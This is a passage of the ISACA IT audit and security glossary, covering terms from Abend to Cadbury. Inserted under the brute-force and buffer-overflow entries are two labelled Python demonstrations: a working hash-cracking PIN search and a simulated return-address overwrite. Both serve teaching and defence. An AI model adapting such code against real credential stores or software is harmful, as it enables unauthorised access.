ISACA Glossary of Terms

Term Definition
Abend
An abnormal end to a computer job; termination of a task prior to its completion because of an error condition that cannot be resolved by recovery facilities while the task is executing

Acceptable interruption window
The maximum period of time that a system can be unavailable before compromising the achievement of the enterprise's business objectives

Acceptable use policy
A policy that establishes an agreement between users and the enterprise and defines for all parties the ranges of use that are approved before gaining access to a network or the Internet

Access control
The processes, rules and deployment mechanisms that control access to information systems, resources and physical access to premises

Access control list (ACL)
An internal computerized table of access rules regarding the levels of computer access permitted to logon IDs and computer terminals
Scope Note: Also referred to as access control tables

Access control table
An internal computerized table of access rules regarding the levels of computer access permitted to logon IDs and computer terminals

Access method
The technique used for selecting records in a file, one at a time, for processing, retrieval or storage
The access method is related to, but distinct from, the file organization, which determines how the records are stored.

Access path
The logical route that an end user takes to access computerized information
Scope Note: Typically includes a route through the operating system, telecommunications software, selected application software and the access control system

Access rights
The permission or privileges granted to users, programs or workstations to create, change, delete or view data and files within a system, as defined by rules established by data owners and the information security policy

Access server
Provides centralized access control for managing remote access dial-up services

Accountability
The ability to map a given activity or event back to the responsible party

Accountability of governance
Governance ensures that enterprise objectives are achieved by evaluating stakeholder needs, conditions and options; setting direction through prioritization and decision making; and monitoring performance, compliance and progress against plans. In most enterprises, governance is the responsibility of the board of directors under the leadership of the chairperson.
Scope Note: COBIT 5 Perspective
© 2014 ISACA. All rights reserved.
Accountable party
The individual, group or entity that is ultimately responsible for a subject matter, process or scope
Scope Note: Within the IT Assurance Framework (ITAF), the term "management" is equivalent to "accountable party."

Acknowledgment (ACK)
A flag set in a packet to indicate to the sender that the previous packet sent was accepted correctly by the receiver without errors, or that the receiver is now ready to accept a transmission

Active recovery site (Mirrored)
A recovery strategy that involves two active sites, each capable of taking over the other's workload in the event of a disaster
Scope Note: Each site will have enough idle processing power to restore data from the other site and to accommodate the excess workload in the event of a disaster.

Active response
A response in which the system either automatically, or in concert with the user, blocks or otherwise affects the progress of a detected attack
Scope Note: Takes one of three forms: amending the environment, collecting more information or striking back against the user

Activity
The main actions taken to operate the COBIT process

Address
Within computer storage, the code used to designate the location of a specific piece of data

Address space
The number of distinct locations that may be referred to with the machine address
Scope Note: For most binary machines, it is equal to 2^n, where n is the number of bits in the machine address.

Addressing
The method used to identify the location of a participant in a network
Scope Note: Ideally, specifies where the participant is located rather than who they are (name) or how to get there (routing)

Adjusting period
The calendar can contain "real" accounting periods and/or adjusting accounting periods. The "real" accounting periods must not overlap and cannot have any gaps between them. Adjusting accounting periods can overlap with other accounting periods.
Scope Note: For example, a period called DEC93 can be defined that includes 01-DEC-1993 through 31-DEC-1993. An adjusting period called DEC3193 can also be defined that includes only one day: 31-DEC-1993 through 31-DEC-1993.

Administrative control
The rules, procedures and practices dealing with operational effectiveness, efficiency and adherence to regulations and management policies

Advanced Encryption Standard (AES)
A public algorithm that supports keys from 128 bits to 256 bits in size
Advanced persistent threat (APT)
An adversary that possesses sophisticated levels of expertise and significant resources which allow it to create opportunities to achieve its objectives using multiple attack vectors (NIST SP 800-61)
Scope Note: The APT:
1. pursues its objectives repeatedly over an extended period of time
2. adapts to defenders' efforts to resist it
3. is determined to maintain the level of interaction needed to execute its objectives

Adversary
A threat agent

Adware
A software package that automatically plays, displays or downloads advertising material to a computer after the software is installed on it or while the application is being used
Scope Note: In most cases, this is done without any notification to the user or without the user's consent. The term adware may also refer to software that displays advertisements, whether or not it does so with the user's consent; such programs display advertisements as an alternative to shareware registration fees. These are classified as adware in the sense of advertising-supported software, but not as spyware. Adware in this form does not operate surreptitiously or mislead the user, and it provides the user with a specific service.

Alert situation
The point in an emergency procedure when the elapsed time passes a threshold and the interruption is not resolved. The enterprise entering into an alert situation initiates a series of escalation steps.

Alignment
A state where the enablers of governance and management of enterprise IT support the goals and strategies of the enterprise
Scope Note: COBIT 5 Perspective

Allocation entry
A recurring journal entry used to allocate revenues or costs
Scope Note: For example, an allocation entry could be defined to allocate costs to each department based on headcount.

Alpha
The use of alphabetic characters or an alphabetic character string

Alternate facilities
Locations and infrastructures from which emergency or backup processes are executed, when the main premises are unavailable or destroyed
Scope Note: Includes other buildings, offices or data processing centers

Alternate process
Automatic or manual process designed and established to continue critical business processes from point of failure to return to normal
Alternative routing
A service that allows the option of having an alternate route to complete a call when the marked destination is not available
Scope Note: In signaling, alternative routing is the process of allocating substitute routes for a given signaling traffic stream in case of failure(s) affecting the normal signaling links or routes of that traffic stream.

American Standard Code for Information Interchange
See ASCII

Amortization
The process of cost allocation that assigns the original cost of an intangible asset to the periods benefited; calculated in the same way as depreciation

Analog
A transmission signal that varies continuously in amplitude and time and is generated in wave formation
Scope Note: Analog signals are used in telecommunications

Analytical technique
The examination of ratios, trends, and changes in balances and other values between periods to obtain a broad understanding of the enterprise's financial or operational position and to identify areas that may require further or closer investigation
Scope Note: Often used when planning the assurance assignment

Anomaly
Unusual or statistically rare

Anomaly detection
Detection on the basis of whether the system activity matches that defined as abnormal

Anonymity
The quality or state of not being named or identified

Antimalware
A technology widely used to prevent, detect and remove many categories of malware, including computer viruses, worms, Trojans, keyloggers, malicious browser plug-ins, adware and spyware

Antivirus software
An application software deployed at multiple points in an IT architecture
It is designed to detect and potentially eliminate virus code before damage is done and repair or quarantine files that have already been infected

Appearance
The act of giving the idea or impression of being or doing something

Appearance of independence
Behavior adequate to meet the situations occurring during audit work (interviews, meetings, reporting, etc.)
Scope Note: An IS auditor should be aware that appearance of independence depends on the perceptions of others and can be influenced by improper actions or associations.
Applet
A program written in a portable, platform-independent computer language, such as Java, JavaScript or Visual Basic
Scope Note: An applet is usually embedded in a HyperText Markup Language (HTML) page downloaded from web servers and then executed by a browser on client machines to run any web-based application (e.g., generate web page input forms, run audio/video programs, etc.). Applets can only perform a restricted set of operations, thus preventing, or at least minimizing, the possible security compromise of the host computers. However, applets expose the user's machine to risk if not properly controlled by the browser, which should not allow an applet to access a machine's information without prior authorization of the user.

Application
A computer program or set of programs that performs the processing of records for a specific function
Scope Note: Contrasts with systems programs, such as an operating system or network control program, and with utility programs, such as copy or sort

Application acquisition review
An evaluation of an application system being acquired or evaluated, that considers such matters as: appropriate controls are designed into the system; the application will process information in a complete, accurate and reliable manner; the application will function as intended; the application will function in compliance with any applicable statutory provisions; the system is acquired in compliance with the established system acquisition process

Application architecture
Description of the logical grouping of capabilities that manage the objects necessary to process information and support the enterprise's objectives.
Scope Note: COBIT 5 perspective

Application benchmarking
The process of establishing the effective design and operation of automated controls within an application

Application controls
The policies, procedures and activities designed to provide reasonable assurance that objectives relevant to a given automated solution (application) are achieved

Application development review
An evaluation of an application system under development that considers matters such as: appropriate controls are designed into the system; the application will process information in a complete, accurate and reliable manner; the application will function as intended; the application will function in compliance with any applicable statutory provisions; the system is developed in compliance with the established system development life cycle process

Application implementation review
An evaluation of any part of an implementation project
Scope Note: Examples include project management, test plans and user acceptance testing (UAT) procedures.
Application layer
In the Open Systems Interconnection (OSI) communications model, the application layer provides services for an application program to ensure that effective communication with another application program in a network is possible.
Scope Note: The application layer is not the application that is doing the communication; it is a service layer that provides these services.

Application maintenance review
An evaluation of any part of a project to perform maintenance on an application system
Scope Note: Examples include project management, test plans and user acceptance testing (UAT) procedures.

Application or managed service provider (ASP/MSP)
A third party that delivers and manages applications and computer services, including security services, to multiple users via the Internet or a private network

Application program
A program that processes business data through activities such as data entry, update or query
Scope Note: Contrasts with systems programs, such as an operating system or network control program, and with utility programs such as copy or sort

Application programming
The act or function of developing and maintaining application programs in production

Application programming interface (API)
A set of routines, protocols and tools referred to as "building blocks" used in business application software development
Scope Note: A good API makes it easier to develop a program by providing all the building blocks related to functional characteristics of an operating system that applications need to specify, for example, when interfacing with the operating system (e.g., provided by Microsoft Windows, different versions of UNIX). A programmer utilizes these APIs in developing applications that can operate effectively and efficiently on the platform chosen.

Application proxy
A service that connects programs running on internal networks to services on exterior networks by creating two connections, one from the requesting client and another to the destination service

Application security
Refers to the security aspects supported by the application, primarily with regard to the roles or responsibilities and audit trails within the applications

Application service provider (ASP)
Also known as managed service provider (MSP), it deploys, hosts and manages access to a packaged application to multiple parties from a centrally managed facility.
Scope Note: The applications are delivered over networks on a subscription basis.
Application software tracing and mapping
Specialized tools that can be used to analyze the flow of data through the processing logic of the application software and document the logic, paths, control conditions and processing sequences
Scope Note: Both the command language or job control statements and programming language can be analyzed. This technique includes program/system: mapping, tracing, snapshots, parallel simulations and code comparisons.

Application system
An integrated set of computer programs designed to serve a particular function that has specific input, processing and output activities
Scope Note: Examples include general ledger, manufacturing resource planning and human resource (HR) management.

Architecture
Description of the fundamental underlying design of the components of the business system, or of one element of the business system (e.g., technology), the relationships among them, and the manner in which they support enterprise objectives

Architecture board
A group of stakeholders and experts who are accountable for guidance on enterprise architecture-related matters and decisions, and for setting architectural policies and standards
Scope Note: COBIT 5 perspective

Arithmetic logic unit (ALU)
The area of the central processing unit (CPU) that performs mathematical and analytical operations

Artificial intelligence
Advanced computer systems that can simulate human capabilities, such as analysis, based on a predetermined set of rules

ASCII
Representing 128 characters, the American Standard Code for Information Interchange (ASCII) code normally uses 7 bits. However, some variations of the ASCII code set allow 8 bits. This 8-bit ASCII code allows 256 characters to be represented.

Assembler
A program that takes as input a program written in assembly language and translates it into machine code or machine language

Assembly language
A low-level computer programming language which uses symbolic code and produces machine instructions

Assertion
Any formal declaration or set of declarations about the subject matter made by management
Scope Note: Assertions should usually be in writing and commonly contain a list of specific attributes about the subject matter or about a process involving the subject matter.

Assessment
A broad review of the different aspects of a company or function that includes elements not covered by a structured assurance initiative
Scope Note: May include opportunities for reducing the costs of poor quality, employee perceptions on quality aspects, proposals to senior management on policy, goals, etc.
Asset
Something of either tangible or intangible value that is worth protecting, including people, information, infrastructure, finances and reputation

Assurance
Pursuant to an accountable relationship between two or more parties, an IT audit and assurance professional is engaged to issue a written communication expressing a conclusion about the subject matters for which the accountable party is responsible. Assurance refers to a number of related activities designed to provide the reader or user of the report with a level of assurance or comfort over the subject matter.
Scope Note: Assurance engagements could include support for audited financial statements, reviews of controls, compliance with required standards and practices, and compliance with agreements, licenses, legislation and regulation.

Assurance engagement
An objective examination of evidence for the purpose of providing an assessment on risk management, control or governance processes for the enterprise.
Scope Note: Examples may include financial, performance, compliance and system security engagements

Assurance initiative
An objective examination of evidence for the purpose of providing an assessment on risk management, control or governance processes for the enterprise
Scope Note: Examples may include financial, performance, compliance and system security engagements.

Asymmetric key (public key)
A cipher technique in which different cryptographic keys are used to encrypt and decrypt a message
Scope Note: See Public key encryption.

Asynchronous Transfer Mode (ATM)
A high-bandwidth, low-delay switching and multiplexing technology that allows integration of real-time voice and video as well as data. It is a data link layer protocol.
Scope Note: ATM is a protocol-independent transport mechanism. It allows high-speed data transfer rates at up to 155 Mbit/s.
The acronym ATM should not be confused with the alternate usage for ATM, which refers to an automated teller machine.

Asynchronous transmission
Character-at-a-time transmission

Attack
An actual occurrence of an adverse event

Attack mechanism
A method used to deliver the exploit. Unless the attacker is personally performing the attack, an attack mechanism may involve a payload, or container, that delivers the exploit to the target.

Attack vector
A path or route used by the adversary to gain access to the target (asset)
Scope Note: There are two types of attack vectors: ingress and egress (also known as data exfiltration)

Attenuation
Reduction of signal strength during transmission
Attest reporting engagement
An engagement in which an IS auditor is engaged to either examine management's assertion regarding a particular subject matter or the subject matter directly
Scope Note: The IS auditor's report consists of an opinion on one of the following: The subject matter. These reports relate directly to the subject matter itself rather than to an assertion. In certain situations management will not be able to make an assertion over the subject of the engagement. An example of this situation is when IT services are outsourced to a third party. Management will not ordinarily be able to make an assertion over the controls that the third party is responsible for. Hence, an IS auditor would have to report directly on the subject matter rather than on an assertion.

Attitude
Way of thinking, behaving, feeling, etc.

Attribute sampling
Method to select a portion of a population based on the presence or absence of a certain characteristic

Audit
Formal inspection and verification to check whether a standard or set of guidelines is being followed, records are accurate, or efficiency and effectiveness targets are being met
Scope Note: May be carried out by internal or external groups

Audit accountability
Performance measurement of service delivery including cost, timeliness and quality against agreed service levels

Audit authority
A statement of the position within the enterprise, including lines of reporting and the rights of access

Audit charter
A document approved by those charged with governance that defines the purpose, authority and responsibility of the internal audit activity
Scope Note: The charter should:
- Establish the internal audit function's position within the enterprise
- Authorise access to records, personnel and physical properties relevant to the performance of IS audit and assurance engagements
- Define the scope of the audit function's activities

Audit engagement
A specific audit assignment or review activity, such as an audit, control self-assessment review, fraud examination or consultancy.
Scope Note: An audit engagement may include multiple tasks or activities designed to accomplish a specific set of related objectives.

Audit evidence
The information used to support the audit opinion

Audit expert systems
Expert or decision support systems that can be used to assist IS auditors in the decision-making process by automating the knowledge of experts in the field
Scope Note: This technique includes automated risk analysis, systems software and control objectives software packages.
Audit objective
The specific goal(s) of an audit
Scope Note: These often center on substantiating the existence of internal controls to minimize business risk.

Audit plan
1. A plan containing the nature, timing and extent of audit procedures to be performed by engagement team members in order to obtain sufficient appropriate audit evidence to form an opinion
Scope Note: Includes the areas to be audited, the type of work planned, the high-level objectives and scope of the work, and topics such as budget, resource allocation, schedule dates, type of report and its intended audience and other general aspects of the work
2. A high-level description of the audit work to be performed in a certain period of time

Audit program
A step-by-step set of audit procedures and instructions that should be performed to complete an audit

Audit responsibility
The roles, scope and objectives documented in the service level agreement (SLA) between management and audit

Audit risk
The risk of reaching an incorrect conclusion based upon audit findings
Scope Note: The three components of audit risk are:
- Control risk
- Detection risk
- Inherent risk

Audit sampling
The application of audit procedures to less than 100 percent of the items within a population to obtain audit evidence about a particular characteristic of the population

Audit subject matter risk
Risk relevant to the area under review:
- Business risk (customer capability to pay, creditworthiness, market factors, etc.)
- Contract risk (liability, price, type, penalties, etc.)
- Country risk (political, environment, security, etc.)
- Project risk (resources, skill set, methodology, product stability, etc.)
- Technology risk (solution, architecture, hardware and software infrastructure network, delivery channels, etc.)
Scope Note: See inherent risk

Audit trail
A visible trail of evidence enabling one to trace information contained in statements or reports back to the original input source
Audit universe
An inventory of audit areas that is compiled and maintained to identify areas for audit during the audit planning process
Scope Note: Traditionally, the list includes all financial and key operational systems as well as other units that would be audited as part of the overall cycle of planned work. The audit universe serves as the source from which the annual audit schedule is prepared. The universe will be periodically revised to reflect changes in the overall risk profile.

Auditability
The level to which transactions can be traced and audited through a system

Auditable unit
Subjects, units or systems that are capable of being defined and evaluated
Scope Note: Auditable units may include:
- Policies, procedures and practices
- Cost centers, profit centers and investment centers
- General ledger account balances
- Information systems (manual and computerized)
- Major contracts and programs
- Organizational units, such as product or service lines
- Functions, such as information technology (IT), purchasing, marketing, production, finance, accounting and human resources (HR)
- Transaction systems for activities, such as sales, collection, purchasing, disbursement, inventory and cost accounting, production, treasury, payroll, and capital assets
- Financial statements
- Laws and regulations

Auditor's opinion
A formal statement expressed by the IS auditor/assurance professional that describes the scope of the audit, the procedures used to produce the report and whether or not the findings support that the audit criteria have been met.
Scope Note: The types of opinions are:
- Unqualified opinion: Notes no exceptions or none of the exceptions noted aggregate to a significant deficiency
- Qualified opinion: Notes exceptions aggregated to a significant deficiency (but not a material weakness)
- Adverse opinion: Notes one or more significant deficiencies aggregating to a material weakness
Authentication
1. The act of verifying identity (i.e., user, system)
Scope Note: Risk: Can also refer to the verification of the correctness of a piece of data
2. The act of verifying the identity of a user and the user's eligibility to access computerized information
Scope Note: Assurance: Authentication is designed to protect against fraudulent logon activity. It can also refer to the verification of the correctness of a piece of data.

Authenticity
Undisputed authorship

Automated application controls
Controls that have been programmed and embedded within an application

Availability
Ensuring timely and reliable access to and use of information

Awareness
Being acquainted with, mindful of, conscious of and well informed on a specific subject, which implies knowing and understanding a subject and acting accordingly

Backdoor
A means of regaining access to a compromised system by installing software or configuring existing software to enable remote access under attacker-defined conditions

Backbone
The main communication channel of a digital network. The part of a network that handles the major traffic
Scope Note: Employs the highest-speed transmission paths in the network and may also run the longest distances. Smaller networks are attached to the backbone, and networks that connect directly to the end user or customer are called "access networks." A backbone can span a geographic area of any size from a single building to an office complex to an entire country. Or, it can be as small as a backplane in a single cabinet.

Backup
Files, equipment, data and procedures available for use in the event of a failure or loss, if the originals are destroyed or out of service

Backup center
An alternate facility to continue IT/IS operations when the primary data processing (DP) center is unavailable

Badge
A card or other device that is presented or displayed to obtain access to an otherwise restricted facility, as a symbol of authority (e.g., the police), or as a simple means of identification
Scope Note: Also used in advertising and publicity

Balanced scorecard (BSC)
Developed by Robert S. Kaplan and David P. Norton as a coherent set of performance measures organized into four categories that includes traditional financial measures, but adds customer, internal business process, and learning and growth perspectives

Bandwidth
The range between the highest and lowest transmittable frequencies. It equates to the transmission capacity of an electronic line and is expressed in bytes per second or Hertz (cycles per second).
Bar code
A printed machine-readable code that consists of parallel bars of varied width and spacing

Base case
A standardized body of data created for testing purposes
Scope Note: Users normally establish the data. Base cases validate production application systems and test the ongoing accurate operation of the system.

Baseband
A form of modulation in which data signals are pulsed directly on the transmission medium without frequency division and usually utilize a transceiver
Scope Note: The entire bandwidth of the transmission medium (e.g., coaxial cable) is utilized for a single channel.

Baseline architecture
The existing description of the fundamental underlying design of the components of the business system before entering a cycle of architecture review and redesign
Scope Note: COBIT 5 perspective

Bastion
System heavily fortified against attacks

Batch control
Correctness checks built into data processing systems and applied to batches of input data, particularly in the data preparation stage
Scope Note: There are two main forms of batch controls: sequence control, which involves numbering the records in a batch consecutively so that the presence of each record can be confirmed; and control total, which is a total of the values in selected fields within the transactions.

Batch processing
The processing of a group of transactions at the same time
Scope Note: Transactions are collected and processed against the master files at a specified time.

Baud rate
The rate of transmission for telecommunications data, expressed in bits per second (bps)

Benchmark
A test that has been designed to evaluate the performance of a system
Scope Note: In a benchmark test, a system is subjected to a known workload and the performance of the system against this workload is measured. Typically, the purpose is to compare the measured performance with that of other systems that have been subject to the same benchmark test.

Benchmarking
A systematic approach to comparing enterprise performance against peers and competitors in an effort to learn the best ways of conducting business
Scope Note: Examples include benchmarking of quality, logistic efficiency and various other metrics.

Benefit
In business, an outcome whose nature and value (expressed in various ways) are considered advantageous by an enterprise
Benefits realization
One of the objectives of governance. The bringing about of new benefits for the enterprise, the maintenance and extension of existing forms of benefits, and the elimination of those initiatives and assets that are not creating sufficient value
Scope Note: COBIT 5 perspective

Binary code
A code whose representation is limited to 0 and 1

Biometric locks
Door and entry locks that are activated by such biometric features as voice, eye retina, fingerprint or signature

Biometrics
A security technique that verifies an individual's identity by analyzing a unique physical attribute, such as a handprint

Bit-stream image
Bit-stream backups, also referred to as mirror image backups, involve the backup of all areas of a computer hard disk drive or other type of storage media.
Scope Note: Such backups exactly replicate all sectors on a given storage device including all files and ambient data storage areas.

Black box testing
A testing approach that focuses on the functionality of the application or product and does not require knowledge of the code internals

Block cipher
A public algorithm that operates on plaintext in blocks (strings or groups) of bits

Botnet
A term derived from "robot network"; a large automated and distributed network of previously compromised computers that can be simultaneously controlled to launch large-scale attacks such as a denial-of-service attack on selected victims

Boundary
Logical and physical controls to define a perimeter between the organization and the outside world

Bridge
Data link layer device developed in the early 1980s to connect local area networks (LANs) or create two separate LAN or wide area network (WAN) network segments from a single segment to reduce collision domains
Scope Note: A bridge acts as a store-and-forward device in moving frames toward their destination. This is achieved by analyzing the MAC header of a data packet, which represents the hardware address of an NIC.

Bring your own device (BYOD)
An enterprise policy used to permit partial or full integration of user-owned mobile devices for business purposes

Broadband
Multiple channels are formed by dividing the transmission medium into discrete frequency segments.
Scope Note: Broadband generally requires the use of a modem.

Broadcast
A method to distribute information to multiple recipients simultaneously
Brouter  Device that performs the functions of both a bridge and a router
Scope Note: A brouter operates at both the data link and the network layers. It connects same data link type LAN segments as well as different data link ones, which is a significant advantage. Like a bridge, it forwards packets based on the data link layer address to a different network of the same type. Also, whenever required, it processes and forwards messages to a different data link type network based on the network protocol address. When connecting same data link type networks, it is as fast as a bridge and is able to connect different data link type networks.
Browser  A computer program that enables the user to retrieve information that has been made publicly available on the Internet; also, that permits multimedia (graphics) applications on the World Wide Web
Brute force  A class of algorithms that repeatedly try all possible combinations until a solution is found
Brute force attack  Repeatedly trying all possible combinations of passwords or encryption keys until the correct one is found
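An added example, not part of the glossary: an exhaustive search of a hashed 4-digit PIN in Python, together with the keyspace arithmetic that determines how long such a search takes. The target digest, the PIN "7391" and the guess rates are constructed values; the unsalted, fast hash is deliberately the easy case for the attacker.

```python
import hashlib
import itertools
import string

# Constructed target: the SHA-256 of a 4-digit PIN, as an attacker might find it
# in a leaked credential store. The PIN "7391" is a made-up value.
TARGET_DIGEST = hashlib.sha256(b"7391").hexdigest()


def brute_force_pin(target_digest, alphabet=string.digits, length=4):
    """Try every candidate of the given length until one hashes to the target.

    Returns (recovered_pin, attempts), or (None, attempts) if the space is exhausted.
    """
    attempts = 0
    for candidate in itertools.product(alphabet, repeat=length):
        attempts += 1
        pin = "".join(candidate)
        if hashlib.sha256(pin.encode()).hexdigest() == target_digest:
            return pin, attempts
    return None, attempts


def keyspace(alphabet_size, length):
    """Number of candidates an exhaustive search must cover in the worst case."""
    return alphabet_size ** length


def expected_seconds(alphabet_size, length, guesses_per_second):
    """Average time to hit the right value: half the keyspace at the given guess rate."""
    return keyspace(alphabet_size, length) / 2 / guesses_per_second


if __name__ == "__main__":
    pin, attempts = brute_force_pin(TARGET_DIGEST)
    print(f"recovered {pin} after {attempts} attempts")
    # 8-character mixed-case alphanumeric password at an assumed 10^9 SHA-256 guesses/s
    print(f"8-char [A-Za-z0-9]: {keyspace(62, 8)} candidates, "
          f"~{expected_seconds(62, 8, 1e9) / 3600:.1f} hours on average")
```

The two arithmetic helpers show why the defences against brute force are longer secrets over larger alphabets, a deliberately slow password hash (bcrypt, scrypt or Argon2 instead of a bare SHA-256) and rate limiting or lockout on online guessing; a salt defeats precomputed tables but does nothing for the single-hash search shown here.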
Budget  Estimated cost and revenue amounts for a given range of periods and set of books
Scope Note: There can be multiple budget versions for the same set of books.
Budget formula  A mathematical expression used to calculate budget amounts based on actual results, other budget amounts and statistics.
Scope Note: With budget formulas, budgets using complex equations, calculations and allocations can be automatically created.
Budget hierarchy  A group of budgets linked together at different levels such that the budgeting authority of a lower-level budget is controlled by an upper-level budget
Budget organization  An entity (department, cost center, division or other group) responsible for entering and maintaining budget data
Buffer  Memory reserved to temporarily hold data to offset differences between the operating speeds of different devices, such as a printer and a computer
Scope Note: In a program, buffers are reserved areas of random access memory (RAM) that hold data while they are being processed.
Buffer overflow  Occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold
Scope Note: Since buffers are created to contain a finite amount of data, the extra information, which has to go somewhere, can overflow into adjacent memory, corrupting or overwriting the valid data held there; on the stack this includes saved return addresses, on the heap it includes allocator metadata and neighbouring objects. Although it may occur accidentally through programming error, buffer overflow is a common type of security attack on data integrity. In buffer overflow attacks, the extra data may contain code or addresses designed to trigger specific actions, in effect sending new instructions to the attacked computer that could, for example, damage the user's files, change data or disclose confidential information. Buffer overflow attacks are said to have arisen because the C programming language supplied the framework (unchecked array and pointer writes), and poor programming practices supplied the vulnerability; bounds-checked copy routines and memory-safe languages remove the primary cause.
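An added illustration, not from the glossary: a Python model of the mechanism, since Python itself has no unchecked memory writes. A bytearray stands in for a stack frame holding a 16-byte buffer followed by the saved return address; an unchecked copy (the strcpy/gets pattern) lets input spill into the return address, while the bounded copy rejects oversize input. The buffer size, return address and payload bytes are constructed values, and an IndexError plays the role of the crash a real program would suffer when it runs off the end of the frame.

```python
import struct

BUF_SIZE = 16   # bytes reserved for the local buffer in the model stack frame
RET_SIZE = 8    # the saved return address that sits immediately after it


def new_frame(return_address):
    """Model a stack frame as [BUF_SIZE-byte buffer][8-byte saved return address]."""
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<Q", return_address))


def saved_return(frame):
    """Read back the saved return address stored after the buffer."""
    return struct.unpack("<Q", bytes(frame[BUF_SIZE:BUF_SIZE + RET_SIZE]))[0]


def unchecked_copy(frame, data):
    """Vulnerable pattern (think strcpy/gets): copies every input byte, no length check.

    Bytes beyond BUF_SIZE land in the adjacent field; bytes beyond the frame raise
    IndexError, standing in for the crash a real program would suffer.
    """
    for i, b in enumerate(data):
        frame[i] = b
    return frame


def checked_copy(frame, data):
    """Hardened pattern (think strlcpy/snprintf with an explicit size): reject oversize input."""
    if len(data) > BUF_SIZE:
        raise ValueError(f"input of {len(data)} bytes exceeds {BUF_SIZE}-byte buffer")
    frame[:len(data)] = data
    return frame


def run(copy, payload, return_address=0x401000):
    """Run one copy routine against a fresh frame.

    Returns (outcome, saved_return_after), where outcome is "ok", "crash" or "rejected".
    """
    frame = new_frame(return_address)
    try:
        copy(frame, payload)
    except IndexError:
        return "crash", saved_return(frame)
    except ValueError:
        return "rejected", saved_return(frame)
    return "ok", saved_return(frame)


# Constructed attacker payload: fill the buffer, then overwrite the saved return
# address with an attacker-chosen value (0xDEADBEEF is arbitrary).
OVERFLOW_PAYLOAD = b"A" * BUF_SIZE + struct.pack("<Q", 0xDEADBEEF)


if __name__ == "__main__":
    print("unchecked, benign input :", run(unchecked_copy, b"hello"))
    print("unchecked, overflow     :", run(unchecked_copy, OVERFLOW_PAYLOAD))
    print("checked, overflow       :", run(checked_copy, OVERFLOW_PAYLOAD))
```

The instructive case is the second one: the overflow neither crashes nor raises, it silently replaces the return address, which is exactly why such bugs go unnoticed until someone crafts the extra bytes deliberately.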
Bulk data transfer  A data recovery strategy that includes a recovery from complete backups that are physically shipped offsite once a week
Scope Note: Specifically, logs are batched electronically several times daily, and then loaded into a tape library located at the same facility as the planned recovery.
Bus  Common path or channel between hardware devices
Scope Note: Can be located between components internal to a computer or between external computers in a communication network.
Bus configuration  All devices (nodes) are linked along one communication line where transmissions are received by all attached nodes.
Scope Note: This architecture is reliable in very small networks, as well as easy to use and understand. This configuration requires the least amount of cable to connect the computers together and, therefore, is less expensive than other cabling arrangements. It is also easy to extend, and two cables can be easily joined with a connector to make a longer cable for more computers to join the network. A repeater can also be used to extend a bus configuration.
Business balanced scorecard  A tool for managing organizational strategy that uses weighted measures for the areas of financial performance (lag) indicators, internal operations, customer measurements, learning and growth (lead) indicators, combined to rate the enterprise
Business case  Documentation of the rationale for making a business investment, used both to support a business decision on whether to proceed with the investment and as an operational tool to support management of the investment through its full economic life cycle
Business continuity  Preventing, mitigating and recovering from disruption
Scope Note: The terms business resumption planning, disaster recovery planning and contingency planning also may be used in this context; they focus on recovery aspects of continuity, and for that reason the resilience aspect should also be taken into account.
COBIT 5 perspective
Business continuity plan (BCP)  A plan used by an enterprise to respond to disruption of critical business processes. Depends on the contingency plan for restoration of critical systems
Business control  The policies, procedures, practices and organizational structures designed to provide reasonable assurance that the business objectives will be achieved and undesired events will be prevented or detected
Business dependency assessment  A process of identifying resources critical to the operation of a business process
Business function  An activity that an enterprise does, or needs to do, to achieve its objectives
Business goal  The translation of the enterprise's mission from a statement of intention into performance targets and results
Business impact  The net effect, positive or negative, on the achievement of business objectives
Business impact analysis (BIA)  A process to determine the impact of losing the support of any resource
Scope Note: The BIA assessment study will establish the escalation of that loss over time. It is predicated on the fact that senior management, when provided reliable data to document the potential impact of a lost resource, can make the appropriate decision.
Business impact analysis/assessment (BIA)  Evaluating the criticality and sensitivity of information assets. An exercise that determines the impact of losing the support of any resource to an enterprise, establishes the escalation of that loss over time, identifies the minimum resources needed to recover, and prioritizes the recovery of processes and the supporting system
Scope Note: This process also includes addressing:
- Income loss
- Unexpected expense
- Legal issues (regulatory compliance or contractual)
- Interdependent processes
- Loss of public reputation or public confidence
Business interruption  Any event, whether anticipated (e.g., public service strike) or unanticipated (e.g., blackout), that disrupts the normal course of business operations at an enterprise
Business Model for Information Security (BMIS)  A holistic and business-oriented model that supports enterprise governance and management of information security, and provides a common language for information security professionals and business management
Business objective  A further development of the business goals into tactical targets and desired results and outcomes
Business process  An interrelated set of cross-functional activities or events that result in the delivery of a specific product or service to a customer
Business process control  The policies, procedures, practices and organizational structures designed to provide reasonable assurance that a business process will achieve its objectives.
Scope Note: COBIT 5 perspective
Business process integrity  Controls over the business processes that are supported by the enterprise resource planning (ERP) system
Business process owner  The individual responsible for identifying process requirements, approving process design and managing process performance
Scope Note: Must be at an appropriately high level in the enterprise and have authority to commit resources to process-specific risk management activities
Business process reengineering (BPR)  The thorough analysis and significant redesign of business processes and management systems to establish a better performing structure, more responsive to the customer base and market conditions, while yielding material cost savings
Business risk  A probable situation with uncertain frequency and magnitude of loss (or gain)
Business service provider (BSP)  An application service provider (ASP) that also provides outsourcing of business processes such as payment processing, sales order processing and application development
Business sponsor  The individual accountable for delivering the benefits and value of an IT-enabled business investment program to the enterprise
Business-to-business  Transactions in which the acquirer is an enterprise or an individual operating in the ambit of his/her professional activity. In this case, laws and regulations related to consumer protection are not applicable.
Scope Note: The contract's general terms should be communicated to the other party and specifically approved. Some companies require the other party to fill out check boxes where there is a description such as "I specifically approve the clauses". This is not convincing; the best solution is the adoption of a digital signature scheme, which allows the approval of clauses and terms with the non-repudiation condition.
Business-to-consumer  Selling processes in which the involved parties are the enterprise, which offers goods or services, and a consumer. In this case there is comprehensive legislation that protects the consumer.
Scope Note: Comprehensive legislation includes:
- Regarding contracts established outside the merchant's property (such as the right to end the contract with full refund or the return policy for goods)
- Regarding distance contracts (such as rules that establish how a contract should be written, specific clauses and the need to transmit it to the consumer and have it approved)
- Regarding the electronic form of the contract (such as, on the Internet, the possibility for the consumer to exit from the procedure without having his/her data recorded)
Business-to-consumer e-commerce (B2C)  Refers to the processes by which enterprises conduct business electronically with their customers and/or the public at large using the Internet as the enabling technology
Bypass label processing (BLP)  A technique of reading a computer file while bypassing the internal file/data set label. This process could result in bypassing of the security access control system.
Cadbury  The Committee on the Financial Aspects of Corporate Governance, set up in May 1991 by the UK Financial Reporting Council, the London Stock Exchange and the UK accountancy profession, was chaired by Sir Adrian Cadbury and produced a report on the subject commonly known in the UK as the Cadbury Report.
